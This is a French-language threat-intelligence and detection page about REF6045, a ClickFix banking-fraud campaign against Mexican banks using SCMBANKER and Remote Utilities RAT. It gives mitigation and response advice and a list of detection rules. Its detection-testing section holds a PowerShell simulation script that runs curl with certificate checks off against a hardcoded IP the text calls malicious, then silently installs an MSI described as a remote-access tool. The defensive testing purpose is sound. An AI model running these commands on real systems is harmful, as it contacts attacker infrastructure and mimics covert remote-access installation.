ClickFix à Cash-Out : Décomposition d’un kit de fraude bancaire mexicain
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
REF6045 est une campagne de fraude bancaire assistée par opérateur ciblant le secteur financier mexicain. Elle utilise une méthode de livraison de type ClickFix avec de fausses pages CAPTCHA pour convaincre les victimes d’exécuter des commandes PowerShell malveillantes. Après infection, l’outil SCMBANKER permet aux opérateurs humains d’observer les sessions bancaires, de capturer des captures d’écran, de modifier le contenu du presse-papiers, et de déployer Remote Utilities RAT pour un contrôle à distance complet.
Enquête
Les laboratoires Elastic Security ont découvert la menace après avoir détecté des bitsadmin activités suspectes téléchargeant des scripts PowerShell depuis un répertoire ouvert. L’enquête a exposé l’ensemble de l’outil via une archive web-root accessible publiquement, zkt.zip, et a révélé des failles majeures de sécurité opérationnelle, y compris des éditeurs de fichiers non authentifiés et des répertoires ouverts sur l’infrastructure de commande et de contrôle. L’analyse a également montré que l’outil contient de nombreux artefacts générés par IA dans sa base de code.
Atténuation
Les organisations devraient limiter l’utilisation de PowerShell et bitsadmin aux utilisateurs approuvés et appliquer des contrôles stricts d’exécution. Les utilisateurs doivent être formés à identifier les leurres d’ingénierie sociale tels que les faux invites CAPTCHA ou les faux écrans de mise à jour Windows. Les équipes de sécurité devraient également déployer une surveillance renforcée des changements de registre suspects et de l’installation non autorisée de logiciels d’accès à distance.
Réponse
Si cette activité est détectée, isolez immédiatement les systèmes affectés pour stopper la communication de commande et de contrôle et le vol potentiel de données. Menez une enquête judiciaire pour déterminer l’étendue du compromis et vérifiez la présence de Remote Utilities ou de modifications non autorisées du registre. Réinitialisez les mots de passe de tous les comptes financiers et autres comptes sensibles accédés depuis les machines affectées.
Flux d’Attaque
Détections
MsiExec lancé par le processus Shell (via cmdline)
Voir
Exécution d’Attrib pour cacher des fichiers (via cmdline)
Voir
Fichiers suspects dans le profil utilisateur public (via file_event)
Voir
Possibilité d’exécution via des lignes de commande PowerShell cachées (via cmdline)
Voir
Arrêt utilisé pour forcer un arrêt ou un redémarrage du système (via cmdline)
Voir
LOLBAS Bitsadmin (via cmdline)
Voir
Comportement d’exécution différée possible (via cmdline)
Voir
Énumération ou manipulation possible de comptes ou groupes (via cmdline)
Voir
Microsoft Edge lançant un processus inhabituel (via cmdline)
Voir
Utilisation suspecte de CURL (via cmdline)
Voir
Emplacement suspect d’exécution d’exécutables/scripts via [cmd.exe /C] (via cmdline)
Voir
Détection de l’installation de SCMBANKER et de Remote Utilities [Création de processus Windows]
Voir
Détection de l’activité du kit d’outils SCMBANKER [Windows Powershell]
Voir
Exécution de simulation
Prérequis: La vérification préliminaire de télémétrie & de base doit avoir été réussie.
Justification: Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Les exemples abstraits ou non liés entraîneront un mauvais diagnostic.
-
Récit d’attaque & Commandes: L’adversaire vise à établir un point d’appui sur le système cible en imitant le modèle de fraude bancaire REF6045. D’abord, ils tentent de télécharger un fichier de validation depuis une adresse IP malveillante codée en dur (
68.211.161.46) en utilisantcurlavec le drapeau-k(insecure) pour contourner la validation du certificat SSL. Après le téléchargement, l’adversaire exécute une installation silencieuse d’un outil d’accès à distance malveillant en utilisantmsiexec.exeavec le drapeau/i(install) et/quiet(silencieux), en ciblant un fichier nomméhosts.msi. Cela leur fournit un accès à distance persistant tout en minimisant l’interaction utilisateur. -
Script de test de régression:
# Script de simulation pour les TTPs REF6045 # Ce script imite les lignes de commande spécifiques définies dans la règle de détection. $WorkDir = "$env:TEMPSimulation" if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir } Set-Location $WorkDir Write-Host "[+] Étape 1: Simulation de transfert d'outil via curl..." -ForegroundColor Cyan # Note: Utilisation d'un fichier factice via curl pour éviter un trafic réellement malveillant, # mais en maintenant la chaîne exacte de ligne de commande requise pour la détection. cmd /c curl -k https://68.211.161.46/validation.txt Write-Host "[+] Étape 2: Simulation d'installation MSI silencieuse..." -ForegroundColor Cyan # Créez un fichier MSI factice pour que msiexec ne tombe pas immédiatement en erreur (bien que la règle déclenche sur la ligne de commande) # Dans le but de tester uniquement la LOGIQUE DE DÉTECTION (la ligne de commande), # nous exécuterons la chaîne de commande exacte. msiexec /i "hosts.msi" /quiet /norestart -
Commandes de nettoyage:
# Script de nettoyage pour supprimer les artefacts $WorkDir = "$env:TEMPSimulation" if (Test-Path $WorkDir) { Remove-Item -Recurse -Force $WorkDir Write-Host "[+] Nettoyage terminé: $WorkDir supprimé." -ForegroundColor Green } else { Write-Host "[!] Nettoyage sauté: Répertoire non trouvé." -ForegroundColor Yellow }